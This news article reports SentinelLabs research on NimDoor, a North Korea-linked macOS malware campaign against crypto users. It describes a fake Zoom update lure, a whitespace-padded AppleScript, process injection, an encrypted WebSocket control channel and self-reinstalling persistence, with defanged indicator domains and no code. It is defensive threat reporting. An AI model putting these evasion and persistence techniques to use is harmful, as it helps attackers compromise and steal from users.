Security researchers at SentinelLabs have uncovered a malware campaign targeting macOS users, particularly those in the cryptocurrency and Web3 sectors. The malware, dubbed “NimDoor,” is linked to North Korean hackers and employs a mix of AppleScript, C++, and Nim-based payloads to infiltrate systems, steal sensitive data, and maintain persistence.
While North Korea’s cyber units often rely on social engineering tactics and phishing schemes, NimDoor introduces unusually advanced techniques that distinguish it from prior macOS threats.
Researchers Phil Stokes and Raffaele Sabato at SentinelLabs said in their joint report, “Unusually for macOS malware, the threat actors employ a process injection technique and remote communications via wss, the TLS-encrypted version of the WebSocket protocol.” This combination of old-school social tactics and rare malware tooling sets NimDoor apart from previous macOS threats.
How the attack works
The attack chain begins with social engineering, and the victim is approached on Telegram by someone pretending to be a familiar contact. The hackers convince targets to join a meeting via Calendly, eventually sending them an email with a link to a bogus “Zoom SDK update script.”
When the recipient clicks the link, it downloads an AppleScript file called zoom_sdk_support.scpt, deliberately padded with 10,000 lines of blank space to obscure its real purpose. Hidden within are only three malicious lines of code that contact a fake domain (support.us05web-zoom[.]forum) designed to look like Zoom’s real URL. This domain downloads a second-stage script that eventually kicks off the real attack.
After initial contact, the malware deposits two files into the system’s temporary directory: a Mach-O executable labeled “a” and a file called “installer.” Each component launches a coordinated attack sequence.
The “a” binary, a Mach-O executable written in C++, drops a payload named netchk, and then retrieves two Bash scripts tasked with collecting data, such as browser histories, system information, and Telegram message archives.
The second file, “installer,” written in Nim, is designed to establish persistence on the infected machine. It deploys two additional Nim-based binaries titled GoogIe LLC (using a capital “i” to mimic a lowercase “L”) and CoreKitAgent. These binaries handle persistent access and ensure data continues to be siphoned from the machine long after the initial compromise.
Must-read Apple coverage
- Nearly 7 in 10 iPhone Owners Plan iPhone 17 Upgrade
- Apple Prepares AI-Powered Siri Upgrade With Google Search Integration
- Apple’s Xcode 26 Beta Now Supports GPT-5 and Claude
- Apple’s Vision Pro Adoption Stalled As Content Released ‘Drip by Drip’
Process injection and wss connections: Rare for macOS
What makes NimDoor especially dangerous is its use of process injection and encrypted communication via the wss:// protocol, both techniques rarely seen in macOS malware.
The “a” binary decrypts an embedded file named trojan1_arm64 and injects it into a decoy process. That injected code then establishes a secure connection with a command-and-control server hosted at wss://firstfromsep[.]online/client.
The malware’s communication system uses custom JSON messages with multiple layers of encryption, including RC4 and base64, allowing the attackers to run commands like fetching system details, changing directories, or executing shell commands.
SentinelLabs noted, “The malware uses multiple levels of RC4 encryption in combination with the base64 encoding and three different keys before the communication.”
One particularly notable discovery is how CoreKitAgent maintains persistence. This binary monitors for termination signals such as SIGINT or SIGTERM, which typically occur when users attempt to force-quit a process.
Instead of stopping, the malware reacts to these signals by reinstalling itself, setting up LaunchAgents, and restoring the core payloads. This ensures the malware survives even if a user attempts to stop it manually.
Why Nim? A language that hides in plain sight
North Korean hackers have used niche programming languages like Go and Rust before, but Nim brings new stealth advantages. Because of its ability to run functions during compile time and intermix with runtime code, Nim makes it harder for analysts to separate malicious code from normal operations.
“Nim’s rather unique ability to execute functions during compile time allows attackers to blend complex behaviour into a binary with less obvious control flow,” wrote SentinelLabs researchers.
This campaign shows a mix of old tricks, like phishing, and new techniques designed specifically for macOS environments, which are often assumed to be more secure.
SentinelLabs encourages “other analysts, researchers, and detection engineers to invest effort in understanding these lesser-known languages and how they will eventually be leveraged.”
Curious how North Korean hackers combine deepfakes and bogus Zoom calls to empty crypto wallets? Read our coverage of this brazen social engineering attack.